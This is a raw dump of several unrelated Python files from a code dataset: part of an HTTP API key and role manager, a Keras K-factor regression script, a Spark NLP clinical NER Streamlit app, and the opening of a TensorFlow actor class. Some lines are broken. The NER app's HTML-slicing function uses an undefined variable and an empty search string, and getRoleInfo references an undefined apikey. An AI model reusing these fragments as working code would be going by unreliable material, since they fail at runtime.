'_http_apipath', None)\n if path == None:\n continue\n\n self.pathmeths[path] = meth\n\n def _saveJsInfo(self):\n if self.jsfile == None:\n return\n\n js = json.dumps( self.jsinfo, indent=2, sort_keys=True)\n with open( self.jsfile, 'wb') as fd:\n fd.write( js.encode('utf8') )\n\n @httppath('/./loadMeldBase64')\n def loadMeldBase64(self, b64):\n '''\n Add a base64 encoded ( for json HTTP ) binary mind meld.\n '''\n meld = self._loadMeldBase64(b64)\n melddir = self.jsinfo.get('melddir')\n if melddir == None:\n return\n\n info = meld.getMeldDict()\n name = info.get('name')\n if name == None or not name.isalnum():\n return\n\n meldpath = os.path.join(melddir,'%s.meld.b64' % name)\n with open(meldpath,'wb') as fd:\n fd.write(b64.encode('utf8'))\n\n @httppath('/./getMindMelds')\n def getMindMelds(self):\n '''\n Return a list of (name,version) tuples for MindMelds.\n '''\n return self.melds\n\n def _loadMeldBase64(self, b64):\n meld = s_mindmeld.loadMeldBase64(b64)\n\n info = meld.getMeldDict()\n\n name = info.get('name')\n vers = info.get('version')\n\n self.melds.append( {'name':name,'version':vers} )\n return meld\n\n @httppath('/./getApiKey')\n def getApiKey(self, apikey):\n '''\n Return the info tuple for an API key.\n\n Example:\n\n info = api.getApiKey(apikey)\n\n '''\n return self.jsinfo['apikeys'].get(apikey)\n\n @httppath('/./getApiKeys')\n def getApiKeys(self):\n '''\n Return a list of (apikey,info) tuples for the HttpApi keys.\n\n Example:\n\n for apikey,keyinfo in api.getApiKeys():\n dostuff()\n\n '''\n return [ (k,i) for (k,i) in self.jsinfo['apikeys'].items() ]\n\n @httppath('/./getRole')\n def getRole(self, role):\n '''\n Returns a role info dict by name ( or None ).\n\n Example:\n\n info = api.getRole('foorole')\n\n '''\n return self.jsinfo['roles'].get(role)\n\n @httppath('/./getRoles')\n def getRoles(self):\n '''\n Return a list of (name,info) tuples for the HttpApi roles.\n\n Example:\n\n for role,info in api.getRoles():\n dostuff()\n\n '''\n return [ (r,i) for (r,i) in self.jsinfo['roles'].items() ]\n\n @httppath('/./addRole')\n def addRole(self, role, en=True):\n '''\n Add a role to the HttpApi.\n\n Example:\n\n api.addRole('foorole')\n\n '''\n with self.jslock:\n roleinfo = self.jsinfo['roles'].get(role)\n if roleinfo != None:\n raise DupRole(role)\n\n self.jsinfo['roles'][role] = initrole(en=en)\n self._saveJsInfo()\n\n @httppath('/./delRole')\n def delRole(self, role):\n '''\n Delete a role from the HttpApi.\n\n Example:\n\n api.delRole('foorole')\n\n '''\n with self.jslock:\n roleinfo = self.jsinfo['roles'].pop(role,None)\n if roleinfo == None:\n raise NoSuchRole(role)\n \n self.rulecache.clear()\n self._saveJsInfo()\n\n @httppath('/./addApiKey')\n def addApiKey(self, apikey, name=None, en=True):\n '''\n Add a new API key.\n\n Example:\n\n api.addApiKey(keystr,name='woot')\n\n '''\n with self.jslock:\n\n if self.jsinfo['apikeys'].get(apikey) != None:\n raise DupApiKey()\n\n self.jsinfo['apikeys'][apikey] = initkey(en=en,name=name)\n self._saveJsInfo()\n\n @httppath('/./delApiKey')\n def delApiKey(self, apikey):\n '''\n Delete an API key.\n\n Example:\n\n api.delApiKey(apikey)\n\n '''\n with self.jslock:\n\n keyinfo = self.jsinfo['apikeys'].pop(apikey,None)\n if keyinfo == None:\n raise NoSuchApiKey(apikey)\n\n self._saveJsInfo()\n self.rulecache.clear()\n\n @httppath('/./getApiKeyAllow')\n def getApiKeyAllow(self, apikey, path):\n '''\n Returns or None for the given API key.\n\n Example:\n\n info = api.getApiKeyAllow(apikey,path)\n if info == None:\n raise NotAllowed()\n\n dostuff()\n\n '''\n cachekey = (apikey,path)\n hit = self.rulecache.get(cachekey)\n if hit != None:\n return hit\n\n keyinfo = self.jsinfo['apikeys'].get(apikey)\n if keyinfo == None:\n return None\n\n if not keyinfo.get('en'):\n return None\n\n for rule,info in keyinfo.get('allows',()):\n if fnmatch.fnmatch(path,rule):\n self.rulecache[cachekey] = info\n return info\n\n for role in keyinfo.get('roles',()):\n roleinfo = self.jsinfo['roles'].get(role)\n if roleinfo == None:\n continue\n\n if not roleinfo.get('en'):\n continue\n\n for rule,info in roleinfo.get('allows',()):\n if fnmatch.fnmatch(path,rule):\n self.rulecache[cachekey] = info\n return info\n\n @httppath('/./addRoleAllow')\n def addRoleAllow(self, role, rule, rate=None):\n '''\n Add an allow rule to a role.\n '''\n with self.jslock:\n roleinfo = self._reqRole(role)\n\n roleinfo['allows'].append( (rule,{'rate':rate}) )\n self.rulecache.clear()\n\n self._saveJsInfo()\n\n def _reqApiKey(self, apikey):\n keyinfo = self.jsinfo['apikeys'].get(apikey)\n if keyinfo == None:\n raise NoSuchApiKey(apikey)\n return keyinfo\n\n def _reqRole(self, role):\n roleinfo = self.jsinfo['roles'].get(role)\n if roleinfo == None:\n raise NoSuchRole(role)\n return roleinfo\n\n @httppath('/./addApiKeyAllow')\n def addApiKeyAllow(self, apikey, rule, rate=None):\n '''\n Add an allow rule to an API key.\n '''\n with self.jslock:\n keyinfo = self._reqApiKey(apikey)\n\n keyinfo['allows'].append( (rule,{'rate':rate}) )\n self.rulecache.clear()\n self._saveJsInfo()\n\n @httppath('/./addApiKeyRole')\n def addApiKeyRole(self, apikey, role):\n '''\n Grant a role to an api key.\n\n Example:\n\n api.addApiKeyRole(apikey,'foorole')\n\n '''\n with self.jslock:\n keyinfo = self._reqApiKey(apikey)\n roleinfo = self._reqRole(role)\n\n roles = keyinfo['roles']\n if role not in roles:\n roles.append(role)\n\n self.rulecache.clear()\n self._saveJsInfo()\n\n @httppath('/./delApiKeyRole')\n def delApiKeyRole(self, apikey, role):\n '''\n Revoke a role from an api key.\n\n Example:\n\n api.delApiKeyRole(apikey,'foorole')\n\n '''\n with self.jslock:\n keyinfo = self._reqApiKey(apikey)\n roleinfo = self._reqRole(role)\n\n roles = keyinfo['roles']\n if role in roles:\n roles.remove(role)\n\n self.rulecache.clear()\n self._saveJsInfo()\n\n def _loadApiObject(self, name, ctor, *args, **kwargs):\n meth = s_dyndeps.getDynLocal(ctor)\n if meth == None:\n raise NoSuchCtor(ctor)\n\n obj = meth(*args,**kwargs)\n self.objs[name] = obj\n\n self.loadHttpPaths(obj)\n\n return obj\n\n @httppath('/./addApiObject')\n def addApiObject(self, name, ctor, *args, **kwargs):\n '''\n Add an object ctor to the HttpApi.\n '''\n self._loadApiObject(name, ctor, *args, **kwargs)\n with self.jslock:\n self.jsinfo['objects'][name] = (ctor,args,kwargs)\n self._saveJsInfo()\n\n @httppath('/./delApiObject')\n def delApiObject(self, name):\n '''\n Delete an object ctor from the HttpApi.\n '''\n with self.jslock:\n self.objs.pop(name,None)\n # FIXME how to pop his methods?\n self.jsinfo['objects'].pop(name,None)\n self._saveJsInfo()\n\n @httppath('/./addApiPath')\n def addApiPath(self, path, objname, methname):\n '''\n Add an API path to the HttpApi.\n\n Example:\n api.addApiObject('woot', 'foo.bar.baz')\n api.addApiPath('/v1/haha', 'woot', 'haha')\n\n '''\n with self.jslock:\n self._loadApiPath(path, objname, methname)\n self.jsinfo['apipaths'][path] = {'obj':objname,'meth':methname}\n self._saveJsInfo()\n\n @httppath('/./delApiPath')\n def delApiPath(self, path):\n '''\n Delete an API path from the HttpApi.\n '''\n with self.jslock:\n self.pathmeths.pop(path,None)\n self.jsinfo['apipaths'].pop(path,None)\n self._saveJsInfo()\n\n def callApiPath(self, apikey, path, *args, **kwargs):\n '''\n Call the given API and return a dict of ret/exc.\n '''\n ret = {}\n start = time.time()\n\n try:\n ret['ret'] = self.pathmeths.get(path)(*args,**kwargs)\n except Exception as e:\n ret['err'] = e.__class__.__name__\n ret['msg'] = str(e)\n\n ret['took'] = time.time() - start\n return ret\n\n @httppath('/./getApiKeyInfo')\n def getApiKeyInfo(self, apikey, prop):\n '''\n Return an api key property.\n\n Example:\n\n if api.getApiKeyInfo(apikey,'en'):\n print('enabled!')\n\n '''\n info = self._reqApiKey(apikey)\n return info.get(prop)\n\n @httppath('/./setApiKeyInfo')\n def setApiKeyInfo(self, apikey, prop, valu):\n '''\n Set an api key property (and save).\n\n Example:\n\n api.setApiKeyInfo(apikey, 'en', False)\n\n '''\n with self.jslock:\n info = self._reqApiKey(apikey)\n info[prop] = valu\n\n self.rulecache.clear()\n self._saveJsInfo()\n\n @httppath('/./getRoleInfo')\n def getRoleInfo(self, role, prop):\n '''\n Return a role property.\n\n Example:\n\n if api.getRoleInfo(role, 'en'):\n print('enabled!')\n\n '''\n info = self._reqApiKey(apikey)\n return info.get(prop)\n\n @httppath('/./setRoleInfo')\n def setRoleInfo(self, role, prop, valu):\n '''\n Set a role property (and save).\n\n Example:\n\n api.setRoleInfo(role, 'en', False)\n\n '''\n with self.jslock:\n info = self._reqRole(role)\n info[prop] = valu\n\n self.rulecache.clear()\n self._saveJsInfo()\n\n def _loadApiPath(self, path, objname, methname):\n obj = self.objs.get(objname)\n if obj == None:\n raise NoSuchApiObj(objname)\n\n meth = getattr(obj,methname,None)\n if meth == None:\n raise NoSuchApiMeth(methname)\n\n self.pathmeths[path] = meth\n\nclass HttpCallError(Exception):\n def __init__(self, retinfo):\n self.retinfo = retinfo\n err = retinfo.get('err')\n msg = retinfo.get('msg')\n Exception.__init__(self, '%s: %s' % (err,msg))\n\nclass HttpApiMeth:\n def __init__(self, url, apikey=None):\n self.url = url\n self.apikey = apikey\n self.headers = {}\n\n if self.apikey != None:\n self.headers['apikey'] = apikey\n\n def __call__(self, *args, **kwargs):\n data = json.dumps({'args':args,'kwargs':kwargs})\n reply = requests.post(self.url, headers=self.headers, data=data)\n retinfo = reply.json()\n if retinfo.get('err') != None:\n raise HttpCallError(retinfo)\n\n return retinfo.get('ret')\n\nclass HttpApiProxy:\n '''\n Pythonic HTTP API proxy which allows \"object like\" calling.\n\n Example:\n\n api = HttpApiProxy('https://kenshoto.com/v1/context', apikey=mykey)\n\n x = api.getfoo('woot')\n\n '''\n def __init__(self, url, apikey=None):\n self.url = url\n self.apikey = apikey\n self.apicache = {}\n\n def __getattr__(self, name):\n meth = self.apicache.get(name)\n if meth != None:\n return meth\n\n if not self.url.endswith('/'):\n name = '/' + name\n\n meth = HttpApiMeth(self.url + name, apikey=self.apikey)\n self.apicache[name] = meth\n return meth\n","sub_path":"synapse/httpapi.py","file_name":"httpapi.py","file_ext":"py","file_size_in_byte":18664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"330763781","text":"# ANN for nn 11\r\n\r\n# Importing libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras.layers.core import Dense, Activation, Dropout\r\nfrom keras.callbacks import History, ModelCheckpoint, EarlyStopping\r\nfrom keras import initializers\r\nfrom keras.optimizers import Adam, Adadelta, SGD, RMSprop\r\nimport time\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# Defining features\r\nnames = ['i','m1','m2','M1','M2','Mu','TanB','Z','MW','h0','H0','A0','H_plus','g','nino_1','nino_2','cino_1','nino_3','nino_4','cino_2','d_L','u_L','s_L','c_L','t_1','b_1','e_L','nue_L','mu_L','numu_L','stau_1','nu_tau_L','d_R','u_R','s_R','c_R','t_2','b_2','e_R','mu_R','stau_2','u11','u12','u21','u22','v11','v12','v21','v22','lo','nlo','K']\r\ndataset = pd.read_csv('all_param12.dat',delim_whitespace=True,names=names)\r\n\r\nX1 = ( abs(dataset.iloc[4256:, [18]].values) + dataset.iloc[4256:, [1]].values)/2\r\nX2 = ( abs(dataset.iloc[4256:, [17]].values) + dataset.iloc[4256:, [2]].values)/2\r\nX3 = (dataset.iloc[4256:, [16]].values + dataset.iloc[4256:, [19]].values )/2\r\nX4 = (dataset.iloc[4256:, [41]].values + abs(dataset.iloc[4256:, [42]].values) + dataset.iloc[4256:, [43]].values + dataset.iloc[4256:, [44]].values )/4\r\nX5 = np.asarray( dataset.iloc[4256:, [45]].values )\r\nX6 = np.asarray( dataset.iloc[4256:, [47]].values )\r\nX7 = np.asarray(dataset.iloc[4256:, [49]].values)\r\nc1 = np.max(abs(np.log(X7)))\r\nX7 = np.max(abs(np.log(X7))) + np.log(X7)\r\n\r\n# xsec nlo (NOT USED FOR TRAINING!!)\r\nX8 = np.asarray(dataset.iloc[4256:, [50]].values)\r\nc2 = np.max(abs(np.log(X8)))\r\nX8 = np.max(abs(np.log(X8))) + np.log(X8)\r\n\r\n# Defining the dataset\r\nX = np.asarray([X1,X2,X3,X4,X5,X6,X7,X8])\r\nX = X[:, :, -1]\r\nX = np.transpose(X)\r\ny = dataset.iloc[4256:, 51].values\r\n\r\n# Function to calculate mean absolute percentage error\r\ndef err(actual, predicted):\r\n return actual - predicted\r\n\r\ndef percentage_err(actual, predicted):\r\n return err(actual, predicted) / (actual)\r\n\r\ndef mape(actual, predicted):\r\n return np.mean(np.abs(percentage_err(actual, predicted)))\r\n\r\n# Peformance and accuracy testing\r\nSplit = [0.05,0.10,0.15,0.20,0.25,0.30,0.35,0.40,0.45,0.50]\r\ntest = open(\"NN_test_12\",\"w+\")\r\nfor i in Split:\r\n # Splitting the dataset into training and test set\r\n start = time.time()\r\n X_train, X_test, y_train, y_test = train_test_split(X,y, test_size = i, random_state = 21)\r\n\r\n # Seperate nlo xsec from test set\r\n Xsec_lo_test = X_test[:,6]\r\n Xsec_nlo_test = X_test[:,7]\r\n X_test = X_test[:,0:7]\r\n X_train = X_train[:,0:7]\r\n \r\n # Feature Scaling\r\n sc_X = StandardScaler()\r\n X_train = sc_X.fit_transform(X_train)\r\n X_test = sc_X.transform(X_test)\r\n \r\n # Initialising the ANN\r\n classifier = Sequential()\r\n\r\n model=Sequential()\r\n for j in range(0,8):\r\n model.add(Dense(32, kernel_initializer=initializers.random_normal(mean=0.0, stddev=0.176177), input_dim=7))\r\n model.add(Activation('selu'))\r\n model.add(Dense(1, init='uniform',activation='linear'))\r\n\r\n history = History()\r\n checkpointer = ModelCheckpoint(filepath=\"K-factor_12.hdf5\", verbose=1, save_best_only=True)\r\n early_stopping = EarlyStopping(monitor='val_loss', patience=50)\r\n \r\n log=open(\"K-factor_12.txt\", \"w\")\r\n learnrate=0.0008\r\n pat=50\r\n iterations = 7\r\n epochs = 250\r\n batch_size = 120\r\n c_lr = 2\r\n lr_limit=learnrate/(c_lr**iterations)\r\n k=0\r\n while learnrate > lr_limit:\r\n early_stopping = EarlyStopping(monitor='val_loss', patience=pat)\r\n opt = Adam(lr=learnrate, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\r\n checkpointer = ModelCheckpoint(filepath='K-factor_12' + str(k) + '.hdf5', verbose=1, save_best_only=True)\r\n model.compile(loss=\"mape\", optimizer=opt)\r\n model.fit(X_train, y_train, validation_data=(X_test,y_test), nb_epoch=epochs, batch_size=batch_size, verbose=2, callbacks=[history,checkpointer,early_stopping])\r\n model.load_weights('K-factor_12' + str(k) + '.hdf5')\r\n learnrate /= c_lr\r\n k=k+1\r\n \r\n # This is how you use your net to predict stuff. Here I predict the test points.\r\n y_pred = model.predict(X_test)\r\n X_pred = model.predict(X_train)\r\n \r\n # Calculate and save execution time and accuracy\r\n results = np.array([[learnrate],[k],[mape(y_test,y_pred)]])\r\n np.savetxt(log,np.transpose(results),delimiter=' ')\r\n print(np.transpose(results))\r\n \r\n # Scale back features\r\n X_test = sc_X.inverse_transform(X_test)\r\n X_train = sc_X.inverse_transform(X_train)\r\n y_test = y_test.reshape(y_pred.shape)\r\n # Calculate and save execution time and accuracy\r\n end = time.time()\r\n total = end - start\r\n final_results = np.array([[total],[i],[mape(y_test,y_pred)]])\r\n np.savetxt(test,np.transpose(final_results),delimiter=' ')\r\n print(np.transpose(final_results))\r\n log.close()\r\n \r\n # True vs Predicted values for K-factor\r\n plt.tight_layout()\r\n ideal = np.arange(np.min(0.95), np.max(1.475), 0.005)\r\n fig3=plt.figure(figsize=(10, 10))\r\n plt.title('True vs. predicted K-factor for ANN',fontsize=16)\r\n plt.xlim(0.95,1.475)\r\n plt.ylim(0.95,1.475)\r\n plt.xlabel('K-factor',fontsize=16)\r\n plt.ylabel('Predicted K-factor',fontsize=16)\r\n plt.plot(y_test, y_pred,'ro', ideal, ideal, 'r--',color ='blue',lw=2,alpha=0.7)\r\n a = plt.axes([.625, .15, .25, .2], facecolor='w')\r\n errhist = y_test - y_pred\r\n plt.hist(errhist, range=[-0.15, 0.15], bins=100, density=True,edgecolor = 'black', alpha=0.75,color='b' )\r\n plt.xlim(-0.15,0.15,0.1)\r\n plt.yticks([])\r\n plt.title('Error distribution')\r\n plt.savefig(str(i)+\"NNK_12.png\",bbox_inches='tight',dpi=300)\r\n plt.close()\r\n \r\n # Calculate nlo xsec\r\n Xsec_lo_test = np.exp(Xsec_lo_test - c1)\r\n Xsec_lo_test = Xsec_lo_test.reshape(y_pred.shape)\r\n Xsec_nlo_test = np.exp(Xsec_nlo_test - c2)\r\n Xsec_nlo_test = Xsec_nlo_test.reshape(y_pred.shape)\r\n Xsec_nlo_pred = y_pred*Xsec_lo_test\r\n \r\n # True vs Predicted values for xsec\r\n plt.tight_layout()\r\n ideal = np.arange(np.min(Xsec_nlo_test), np.max(Xsec_nlo_pred), 0.005)\r\n fig3=plt.figure(figsize=(10, 10))\r\n plt.title('True vs. predicted NLO xsec for ANN',fontsize=16)\r\n plt.xlabel('$\\sigma_{nlo}$ [pb]',fontsize=16)\r\n plt.ylabel('Predicted $\\sigma_{nlo}$ [pb]',fontsize=16)\r\n plt.yscale('log')\r\n plt.xscale('log')\r\n plt.plot(Xsec_nlo_test, Xsec_nlo_pred,'ro', ideal, ideal, 'r--',color ='blue',lw=2,alpha=0.7)\r\n a = plt.axes([.625, .15, .25, .2], facecolor='w')\r\n errhist = Xsec_nlo_test - Xsec_nlo_pred\r\n plt.hist(errhist, range=[-0.005, 0.005], bins=100, density=True,edgecolor = 'black', alpha=0.75,color='b' )\r\n plt.xlim(-0.005,0.005,2)\r\n plt.yticks([])\r\n plt.title('Error distribution')\r\n plt.savefig(str(i)+\"NN_xsec_12.png\",bbox_inches='tight',dpi=300)\r\n plt.close()\r\n \r\n # Relative error\r\n rel_error = (Xsec_nlo_pred - Xsec_nlo_test)/Xsec_nlo_test\r\n plt.tight_layout()\r\n fig3=plt.figure(figsize=(10, 10))\r\n plt.title('Relative error vs. predicted NLO xsec for ANN',fontsize=16)\r\n plt.xlabel('$\\sigma_{nlo}$ [pb]',fontsize=16)\r\n plt.ylabel('Relative error',fontsize=16)\r\n plt.ylim(np.min(Xsec_nlo_test),np.max(Xsec_nlo_test))\r\n plt.yscale('log')\r\n plt.xscale('log')\r\n plt.scatter(Xsec_nlo_test,rel_error,alpha=0.7,color='g')\r\n plt.savefig(str(i)+\"NN_xsec_rel_12.png\",bbox_inches='tight',dpi=300)\r\n plt.close()\r\n \r\n # Fit results\r\n plt.tight_layout()\r\n plt.scatter((X_train[:, 0]),(y_train),c='green',alpha=0.4,s=6)\r\n plt.plot((X_test[:, 0]),(y_pred),c='black',alpha=1.0,zorder=20)\r\n plt.xlabel(\"Z\",fontsize=12)\r\n plt.ylabel(\"K-factor\",fontsize=12)\r\n plt.savefig(str(i)+\"NN_12.png\",bbox_inches='tight',dpi=300)\r\n plt.show()\r\n plt.close()\r\n\r\ntest.close()","sub_path":"ANN_K-factor__12.py","file_name":"ANN_K-factor__12.py","file_ext":"py","file_size_in_byte":8426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499526029","text":"\nimport streamlit as st\nimport pandas as pd\nimport base64\n\nfrom sparknlp_display import NerVisualizer\n\nst.sidebar.image('https://nlp.johnsnowlabs.com/assets/images/logo.png', use_column_width=True)\n\nHTML_WRAPPER = \"\"\"
{}
\"\"\"\n\nst.title(\"Spark NLP Clinical NER Playground\")\n\nimport json\nimport os\nfrom pyspark.ml import Pipeline,PipelineModel\nfrom pyspark.sql import SparkSession\n\nfrom sparknlp.annotator import *\nfrom sparknlp_jsl.annotator import *\nfrom sparknlp.base import *\nimport sparknlp_jsl\nimport sparknlp\n\n\nimport json\n\nspark = sparknlp_jsl.start(os.environ['SECRET'])\n\nprint (\"Spark NLP Version :\", sparknlp.version())\nprint (\"Spark NLP_JSL Version :\", sparknlp_jsl.version())\n\n\n@st.cache(allow_output_mutation=True, suppress_st_warning=True)\ndef load_sparknlp_models():\n\n print ('loading pretrained models')\n\n sentenceDetector = SentenceDetectorDLModel.pretrained(\"sentence_detector_dl_healthcare\",\"en\",\"clinical/models\")\\\n .setInputCols([\"document\"])\\\n .setOutputCol(\"sentence\")\n\n embeddings_clinical = WordEmbeddingsModel.pretrained(\"embeddings_clinical\",\"en\",\"clinical/models\")\\\n .setInputCols([\"sentence\",\"token\"])\\\n .setOutputCol(\"embeddings\")\n\n model_dict = {\n 'sentenceDetector': sentenceDetector,\n 'embeddings_clinical':embeddings_clinical\n }\n \n for ner_model in ner_models_clinical:\n\n try:\n model_dict[ner_model] = MedicalNerModel.pretrained(ner_model,\"en\",\"clinical/models\")\\\n .setInputCols([\"sentence\",\"token\",\"embeddings\"])\\\n .setOutputCol(\"ner\")\n except:\n pass\n #st.write ('model name is wrong > ', ner_model)\n\n print ('models loaded !')\n\n return model_dict\n\n@st.cache(allow_output_mutation=True, suppress_st_warning=True)\ndef load_sparknlp_models_biobert():\n\n print ('loading pretrained models')\n\n sentenceDetector = SentenceDetectorDLModel.pretrained(\"sentence_detector_dl_healthcare\",\"en\",\"clinical/models\")\\\n .setInputCols([\"document\"])\\\n .setOutputCol(\"sentence\")\n\n embeddings_biobert = BertEmbeddings.pretrained(\"biobert_pubmed_base_cased\").setInputCols([\"sentence\", \"token\"]).setOutputCol(\"embeddings\")\n\n model_dict = {\n 'sentenceDetector': sentenceDetector,\n 'embeddings_biobert':embeddings_biobert\n }\n \n for ner_model in ner_models_biobert :\n\n try:\n model_dict[ner_model] = MedicalNerModel.pretrained(ner_model,\"en\",\"clinical/models\")\\\n .setInputCols([\"sentence\",\"token\",\"embeddings\"])\\\n .setOutputCol(\"ner\")\n except:\n pass\n #st.write ('model name is wrong > ', ner_model)\n\n print ('models loaded !')\n\n return model_dict\n\nimport subprocess\n\nsubprocess.run([\"wget\", \"https://nlp.johnsnowlabs.com/models.json\"])\n\nwith open('/content/models.json') as f:\n model_master_list = json.load(f)\n\nner_models_biobert = list(set([x['name'] for x in model_master_list if x['task']==\"Named Entity Recognition\" and x['edition'].startswith('Spark NLP for Healthcare') and 'biobert' in x['name'] and x['edition'].split()[-1]>='3.0']))\nner_models_clinical = list(set([x['name'] for x in model_master_list if x['task']==\"Named Entity Recognition\" and x['edition'].startswith('Spark NLP for Healthcare') and 'biobert' not in x['name'] and 'healthcare' not in x['name'] and x['edition'].split()[-1]>='3.0']))\n\n\nmodel_dict_1 = load_sparknlp_models()\nmodel_dict_2 = load_sparknlp_models_biobert()\n\n\nif not st.sidebar.checkbox('with BioBert Embeddings'):\n emb = 'clinical'\n model_dict = model_dict_1\nelse:\n model_dict = model_dict_2\n emb = 'biobert'\n\n\ndef display_time(start_tm):\n end_tm = time.time()\n diff = end_tm - start_tm\n st.write('{} sec'.format(round(diff,4)), unsafe_allow_html=True)\n\n\ndef viz (annotated_text, chunk_col):\n\n raw_html = NerVisualizer().display(annotated_text, chunk_col, return_html=True)\n sti = raw_html.find('')+8\n st.markdown(raw_html[sti:ste], unsafe_allow_html=True)\n\n st.write(HTML_WRAPPER.format(raw_html[ste:]), unsafe_allow_html=True)\n\n\ndef get_table_download_link(df):\n \n \"\"\"Generates a link allowing the data in a given panda dataframe to be downloaded\n in: dataframe\n out: href string\n \"\"\"\n csv = df.to_csv(index=False)\n b64 = base64.b64encode(csv.encode()).decode() # some strings <-> bytes conversions necessary here\n href = f'Download table as csv file'\n st.write('')\n st.markdown(href, unsafe_allow_html=True)\n\n\n\ndef build_dynamic_pipeline(payload, embeddings_name='embeddings_clinical'):\n \n document = DocumentAssembler()\\\n .setInputCol(\"text\")\\\n .setOutputCol(\"document\")\n\n sentence = model_dict['sentenceDetector']\n\n token = Tokenizer()\\\n .setInputCols(['sentence'])\\\n .setOutputCol('token')\n \n embeddings = model_dict[embeddings_name]\n\n st.write()\n\n ner_pipe = []\n\n for ner, entities in payload.items():\n \n first = len(ner_pipe) == 0\n \n ner_pipe.append(model_dict[ner]\\\n .setInputCols([\"sentence\", \"token\", \"embeddings\"]) \\\n .setOutputCol(\"{}_tags\".format(ner))\n )\n\n ner_pipe.append(NerConverter()\\\n .setInputCols([\"sentence\", \"token\", \"{}_tags\".format(ner)])\\\n .setOutputCol(\"{}_chunks\".format(ner))\\\n .setWhiteList(entities)\n )\n \n if not first:\n \n ner_pipe.append(ChunkMergeApproach().setInputCols(prev, \"{}_chunks\".format(ner)).\\\n setOutputCol(\"{}_chunks\".format(ner)))\n \n \n prev = \"{}_chunks\".format(ner)\n\n ner_pipeline = Pipeline(\n stages = [\n document,\n sentence,\n token,\n embeddings]+ner_pipe)\n \n return ner_pipeline, prev\n \nst.sidebar.header('Select pretrained NER Model(s)')\n\nst.sidebar.write('')\n\ndef get_labels(model):\n \n m = set(list([c.split('-')[1] for c in model.getClasses() if len(c)>1]))\n \n return list(m)\n\ndef get_payload():\n \n ner_list = [i for i in model_dict.keys() if 'ner' in i]\n \n ner_payload =dict()\n \n for ner in ner_list:\n \n if ner=='clinical_ner':\n \n st.sidebar.checkbox(ner, value=True)\n \n if st.sidebar.checkbox(ner):\n\n classes = get_labels(model_dict[ner])\n\n concepts = st.sidebar.multiselect(\"entities in {}\".format(ner), options=classes, default=classes)\n\n ner_payload[ner] = concepts\n \n return ner_payload\n\nfrom sparknlp_display import NerVisualizer\n\n\ndef get_entities (ner_pipeline, text):\n \n empty_data = spark.createDataFrame([[\"\"]]).toDF(\"text\")\n\n ner_model = ner_pipeline.fit(empty_data)\n\n light_model = LightPipeline(ner_model)\n\n full_annotated_text = light_model.fullAnnotate(text)[0]\n\n st.write('')\n st.subheader('Entities')\n\n chunks=[]\n entities=[]\n \n for n in full_annotated_text[chunk_col]:\n\n chunks.append(n.result)\n entities.append(n.metadata['entity']) \n\n df = pd.DataFrame({'chunks':chunks, 'entities':entities})\n\n #show_html_spacy(full_annotated_text, chunk_col)\n\n viz (full_annotated_text, chunk_col)\n \n st.table(df)\n \n return df\n\n\nner_list = [i for i in model_dict.keys() if 'ner' in i.lower()]\n\nsorted(ner_list)\n\nif st.sidebar.checkbox('Run all NERs'):\n \n st.sidebar.markdown(\"---\")\n \n ner_payload = dict()\n\n concepts = []\n \n for ner in ner_list:\n\n classes = get_labels(model_dict[ner])\n\n ner_concepts = st.sidebar.multiselect(\"entities in {}\".format(ner), options=classes, default=classes)\n\n ner_payload[ner] = ner_concepts\n \n concepts.extend(ner_concepts)\n\nelse:\n \n ner_payload = dict()\n\n for ner in ner_list:\n\n if st.sidebar.checkbox(ner):\n\n classes = get_labels(model_dict[ner])\n\n ner_concepts = st.sidebar.multiselect(\"entities in {}\".format(ner), options=classes, default=classes)\n\n ner_payload[ner] = ner_concepts\n\n\nner_text = st.text_area('NER Input Text', 'A 28-year-old female with a history of gestational diabetes mellitus diagnosed eight years prior to presentation and subsequent type two diabetes mellitus ( T2DM ), one prior episode of HTG-induced pancreatitis three years prior to presentation , associated with an acute hepatitis , and obesity with a body mass index ( BMI ) of 33.5 kg/m2 , presented with a one-week history of polyuria , polydipsia , poor appetite , and vomiting. The patient was prescribed 1 capsule of Advil 10 mg for 5 days and magnesium hydroxide 100mg/1ml suspension PO. He was seen by the endocrinology service and she was discharged on 40 units of insulin glargine at night , 12 units of insulin lispro with meals , and metformin 1000 mg two times a day .')\n\nimport time\n\nstart_time = time.time()\n\nif len(ner_payload)!=0:\n \n st.header(\"***chunks will be merged if multiple models selected***\")\n \n if emb=='clinical':\n ner_pipeline, chunk_col = build_dynamic_pipeline (ner_payload)\n else:\n ner_pipeline, chunk_col = build_dynamic_pipeline (ner_payload, embeddings_name='embeddings_biobert')\n\n entities_df = get_entities (ner_pipeline, ner_text)\n \n get_table_download_link(entities_df )\n\n display_time(start_time)\n \n \n# how to run\n# streamlit run sparknlp_ner_playground.py\n","sub_path":"tutorials/streamlit_notebooks/healthcare/sparknlp_ner_playground.py","file_name":"sparknlp_ner_playground.py","file_ext":"py","file_size_in_byte":9739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"319962635","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport numpy as np\nimport time\n\n\nclass Actor:\n \"\"\"Actor (Policy) Model.\"\"\"\n\n def __init__(self, state_size, action_size, action_low, action_high,single_rotor_control = False,hidden_size=128,\n is_training=True):\n \"\"\"Initialize parameters for the actor.\n\n Params\n ======\n state_size (int): Dimension of each state\n action_size (int): Dimension of each action\n action_low (array): Min value of each action dimension\n action_high (array): Max value of each action dimension\n \"\"\"\n self.state_size = state_size\n self.single_rotor_control = single_rotor_control\n \n self.action_size = action_size\n self.action_low = action_low\n self.action_high = action_high\n self.action_range = self.action_high - self.action_low\n self.num_hidden = hidden_size\n self.is_training = is_training\n self.build_model()\n \n def inputs(self):\n with tf.name_scope('actor_inputs'):\n inp_state = tf.placeholder(tf.float32,[None,self.state_size],name='state')\n action_gradients = tf.placeholder(tf.float32,[None,self.action_size],name='action_gradients')\n #is_training = tf.placeholder(tf.bool,name=\"is_training\")\n # placeholder for mask used in weighted experience replay\n #replay_buffer_mask = tf.placeholder(tf.float32,[None],name=\"replay_buffer_mask\")\n return 